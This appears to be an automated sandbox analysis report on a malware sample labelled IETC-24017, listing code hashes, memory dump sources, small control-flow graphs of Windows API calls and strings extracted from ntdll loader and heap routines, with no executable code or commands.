                                                                                                                                                  • Opcode ID: 67fb474f096c39bfd1b183cc22fdb12c9161800019d40314621b4815cf9cfcb2
                                                                                                                                                  • Instruction ID: 4889f6db8dd4104ca600cb690416ae284ce176594bde18681d79a0d83efcda78
                                                                                                                                                  • Opcode Fuzzy Hash: 67fb474f096c39bfd1b183cc22fdb12c9161800019d40314621b4815cf9cfcb2
                                                                                                                                                  • Instruction Fuzzy Hash: 841294B1C81745CAEB18CF65EA5C28D3BB1B74131CBD04A19D2651F2E1EBB4126EEF48
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8e1e5b43f771ae31a5035e3fb7770da789cd1762078404bddd65ffb4b3e46b4f
                                                                                                                                                  • Instruction ID: d91e6b1c5e63f14b08ac710f9e05191c7109e4867bceb431c8876a44426a6463
                                                                                                                                                  • Opcode Fuzzy Hash: 8e1e5b43f771ae31a5035e3fb7770da789cd1762078404bddd65ffb4b3e46b4f
                                                                                                                                                  • Instruction Fuzzy Hash: 89E12974E10259CFCB54DFA8C5809AEFBB2BF89314F24C16AD414AB356DB30A942CF64
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b921f7a42fb6488dcfbb4dbc29c2862e0eac2031fca2371c0efa7ac78955f92b
                                                                                                                                                  • Instruction ID: 0f93311af642276e36189d9e8e8ad1a974e091006e212312b4f12ece0865f1ce
                                                                                                                                                  • Opcode Fuzzy Hash: b921f7a42fb6488dcfbb4dbc29c2862e0eac2031fca2371c0efa7ac78955f92b
                                                                                                                                                  • Instruction Fuzzy Hash: 5CE10874E10259CFCB58DFA8C5819AEFBB2BF89314F24816AD414AB355D730A942CF64
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8ce2c03827df472b98a6501a8c9c1a79423c1cca0e3f63bfefe50f4f0e13ed33
                                                                                                                                                  • Instruction ID: 6fdb354e4c267042fb6fbbabc0d0e3b2acfa9e268034d1920abddd574482597f
                                                                                                                                                  • Opcode Fuzzy Hash: 8ce2c03827df472b98a6501a8c9c1a79423c1cca0e3f63bfefe50f4f0e13ed33
                                                                                                                                                  • Instruction Fuzzy Hash: 23E10774E10259CFCB54DFA8C5809AEFBB2BF88314F24C16AD418AB355D730A942CFA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b62d9470a8a1285c81c5893d0fe9345eb726f705fa8f959a181b4e9b86296b04
                                                                                                                                                  • Instruction ID: e321e2eeba884394ec4ef51a7349376d3859e9ee568c4df059ddd642f2876f14
                                                                                                                                                  • Opcode Fuzzy Hash: b62d9470a8a1285c81c5893d0fe9345eb726f705fa8f959a181b4e9b86296b04
                                                                                                                                                  • Instruction Fuzzy Hash: AEE1FB74E00259CFCB54DFA9C5809AEFBF2BF89314F24816AD514AB356D730A942CFA4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ba424d0fbba076f6c149036b36eafab0db5a21268baf2605bf97dcd84f45d053
                                                                                                                                                  • Instruction ID: f1df738454f3cb572b0092124ab2cbe2ac9247c52dcae941d5f2888b5a61a8b5
                                                                                                                                                  • Opcode Fuzzy Hash: ba424d0fbba076f6c149036b36eafab0db5a21268baf2605bf97dcd84f45d053
                                                                                                                                                  • Instruction Fuzzy Hash: FBD1E43192065ACACB10EB64D9907ADF7B1EF99300F50C79AE50937265EF70AAC4CF80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b1ebdfa3146d052118347252e060cfdd082b08fe83a143e66f32d0bca4195837
                                                                                                                                                  • Instruction ID: 894a96ea8235aecdb1de96c6be57a20217eb1c9928fd97c2d6f22d9f94e18cff
                                                                                                                                                  • Opcode Fuzzy Hash: b1ebdfa3146d052118347252e060cfdd082b08fe83a143e66f32d0bca4195837
                                                                                                                                                  • Instruction Fuzzy Hash: 7CA14D36E00205CFCF09DFA5C4405AEBBB3FF84314B25856EE906AB265EB71D956CB44
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:5%
                                                                                                                                                  Signature Coverage:7.9%
                                                                                                                                                  Total number of Nodes:139
                                                                                                                                                  Total number of Limit Nodes:8

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 174 417a33-417a5c call 42f603 177 417a62-417a70 call 42fc03 174->177 178 417a5e-417a61 174->178 181 417a80-417a91 call 42e0a3 177->181 182 417a72-417a7d call 42fea3 177->182 187 417a93-417aa7 LdrLoadDll 181->187 188 417aaa-417aad 181->188 182->181 187->188
                                                                                                                                                  APIs
                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Load
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2234796835-0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 199 42c973-42c9af call 404753 call 42dbb3 NtClose
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C9AA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 213 1842b60-1842b6c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 215 1842df0-1842dfc LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 214 1842c70-1842c7c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 216 18435c0-18435cc LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ($_22L-I54$_22L-I54

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(_22L-I54,00000111,00000000,00000000), ref: 0041431A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID: _22L-I54$_22L-I54

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 194 42ccf3-42cd37 call 404753 call 42dbb3 RtlFreeHeap
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CBC1F08B,00000007,00000000,00000004,00000000,004172B8,000000F4), ref: 0042CD32
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 189 42cca3-42cce7 call 404753 call 42dbb3 RtlAllocateHeap
                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E7FE,?,?,00000000,?,0041E7FE,?,?,?), ref: 0042CCE2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID:

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 204 42cd43-42cd7c call 404753 call 42dbb3 ExitProcess
                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,277D128D,?,?,277D128D), ref: 0042CD77
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 209 1842c0a-1842c0f 210 1842c11-1842c18 209->210 211 1842c1f-1842c26 LdrInitializeThunk 209->211
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                  Strings
                                                                                                                                                  • Critical section debug info address, xrefs: 0187541F, 0187552E
                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 0187542B
                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754CE
                                                                                                                                                  • Critical section address., xrefs: 01875502
                                                                                                                                                  • corrupted critical section, xrefs: 018754C2
                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018754E2
                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 018754AE, 018754FA
                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 018754B6
                                                                                                                                                  • Thread identifier, xrefs: 0187553A
                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0187540A, 01875496, 01875519
                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01875543
                                                                                                                                                  • 8, xrefs: 018752E3
                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 01875508
                                                                                                                                                  • Critical section address, xrefs: 01875425, 018754BC, 01875534
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01872602
                                                                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018722E4
                                                                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0187261F
                                                                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018725EB
                                                                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01872624
                                                                                                                                                  • @, xrefs: 0187259B
                                                                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01872412
                                                                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01872409
                                                                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018724C0
                                                                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01872506
                                                                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01872498
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                  Strings
                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01888B8F
                                                                                                                                                  • VerifierDebug, xrefs: 01888CA5
                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01888A3D
                                                                                                                                                  • HandleTraces, xrefs: 01888C8F
                                                                                                                                                  • VerifierDlls, xrefs: 01888CBD
                                                                                                                                                  • VerifierFlags, xrefs: 01888C50
                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01888A67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                  Strings
                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01859A2A
                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018599ED
                                                                                                                                                  • apphelp.dll, xrefs: 017F6496
                                                                                                                                                  • LdrpInitShimEngine, xrefs: 018599F4, 01859A07, 01859A30
                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01859A01
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01859A11, 01859A3A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                  Strings
                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 018781E5
                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 01878177, 018781EB
                                                                                                                                                  • LdrpInitializeProcess, xrefs: 0183C6C4
                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01878170
                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01878181, 018781F5
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0183C6C3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018721BF
                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01872160, 0187219A, 018721BA
                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0187219F
